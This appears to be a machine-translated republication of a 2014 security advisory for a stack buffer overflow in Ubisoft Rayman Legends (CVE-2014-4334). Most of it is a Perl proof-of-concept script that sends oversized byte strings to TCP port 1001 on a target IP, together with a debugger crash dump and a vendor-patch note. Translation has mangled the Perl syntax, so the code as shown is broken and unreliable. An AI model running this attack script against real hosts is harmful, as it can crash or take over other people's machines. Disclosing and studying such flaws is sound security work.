Ubisoft Rayman Legends 'memset () 'function Stack Buffer Overflow Vulnerability

Ubisoft Rayman Legends 'memset () 'function Stack Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Ubisoft Entertainment Rayman Legends <1.3.140380
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68080
CVE (CAN) ID: CVE-2014-4334
 
Ubisoft Rayman Legends is a 2013 platform game developed by Ubisoft Montpellier and released by Ubisoft.
 
When Rayman Legends 1.2.103716, 1.1.100477, and 1.0.95278 use the original socket connection of TCP port 1001 to process incoming data, memset () has a boundary error, this allows remote attackers to send long strings during the second connection, causing stack buffer overflow. After successful exploitation, attackers can execute arbitrary code on the affected nodes.
 
<* Source: Gjoko Krstic (liquidworm@gmail.com)

Link: http://secunia.com/advisories/59273/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S..
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the th main title in
# The Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset () boundary error in
# Processing of incoming data thru raw socket connections on TCP port 1001,
# Which can be exploited to cause a stack based buffer overflow by sending
# Long string of bytes on the second connection. Successful exploitation cocould
# Allow execution of arbitrary code on the affected node.
#
#===================================================== ==========================================
#
#(15a8. f0c): Access violation-code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# Eax = aaaaaaaa ebx = 096494a0 ecx = 10909090 edx = 00000002 esi = 1c1bde90 edi = 00000000
# Eip = 715e26df esp = 0f16dcec ebp = 0f16dd14 iopl = 0 nv up ei pl nz na pe cy
# Cs = 0023 ss = 002b ds = 002b es = 002b fs = 0053 gs = 002b efl = 00010207
# MSVCR100! Memset + 0x5f:
# 715e26df f3ab rep stos dword ptr es: [edi]
#0: 028> d esp
# 0f16dcec 42 42 42 64 00 a6 00-00 00 00 aa 00 00 00 00 bbbbbbd ...........
# 0f16dcfc 42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c BBBBBBBB "... PBK.
# 0f16dd0c 90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00. C ......(.......
# 0f16dd1c 50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f PBK. l...
# 0f16dd2c e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07 ...... H...
# 0f16dd3c 3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41 <...... u ...... AAAA
# 0f16dd4c 41 41 41 41 41 41-41 41 41 41 42 42 42 42 aaaaaaaaaabbbb
# 0f16dd5c 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 43 cccccccccccccc
#
#===================================================== ==========================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'liquidworm' Krstic
# @ Zeroscience
#
#
# Advisory ID: ZSL-2014-5187
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php
#
#
#22.05.2014
#
#
 
Use IO: Socket;
 
Print
"
@*************************************** *@
|
| Ubisoft Rayman Legends BoF PoC Script |
|
| ZSL-2014-5187 |
|
@*************************************** *@
";
 
$ Ip = "$ ARGV [0]";
 
If ($ # ARGV! = 0)
{
Print "\ n \ x20 \ x20 \ x1c \ x20Usage: $0 <ipaddr> \ n ";
Exit ();
}
 
Print "\ n \ x20 \ x1c \ x20Target: $ ip \ n ";
Print "\ x20 \ x1c \ x20Initiating first connection \ n ";
 
Sleep 2;
$ Conn1 = IO: Socket: INET-> new (PeerAddr => $ ip, PeerPort => 1001, Proto => 'tcp ');
If (! $ Conn1)
{
Print "\ n \ x20 *** Connection error! \ N ";
Exit ();
} Else
{
Print "\ x20 \ x1c \ x20Connection established \ n ";
}
 
Print $ conn1 "\ x44" x36;
Print $ conn1 "\ x45 \ x45 \ x45 \ x45 ";
Print $ conn1 "\ x46" x2000; # SC contain
Print "\ x20 \ x1c \ x20Payload sent \ n ";
Close $ conn1;
Print "\ x20 \ x1c \ x20First stage completed \ n \ x20 \ x1c \ n ";
Print "\ x20 \ x1c \ x20Initiating second connection \ n ";
 
Sleep 2;
$ Conn2 = IO: Socket: INET-> new (PeerAddr => $ ip, PeerPort => 1001, Proto => 'tcp ');
If (! $ Conn2)
{
Print "\ n \ x20 *** Connection error! \ N ";
Exit ();
} Else
{
Print "\ x20 \ x1c \ x20Connection established \ n ";
}
 
Print $ conn2 "\ x41" x 16;
Print $ conn2 "\ x42 \ x42 \ x42 \ x42"; # ESP->
Print $ conn2 "\ x43" x1000; # SC contain
Print "\ x20 \ x1c \ x20Payload sent \ n ";
Print "\ x20 \ x1c \ x20Second stage completed \ n ";
Close $ conn2;
Print "\ x20 \ x1c \ x20t00t! \ N ";

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Ubisoft Entertainment
---------------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.ubi.com
 
Refer:
Http://www.exploit-db.com/exploits/33804
Http://packetstormsecurity.com/files/127133/Ubisoft-Rayman-Legends-1.2.103716-Buffer-Overflow.html

This article permanently updates the link address: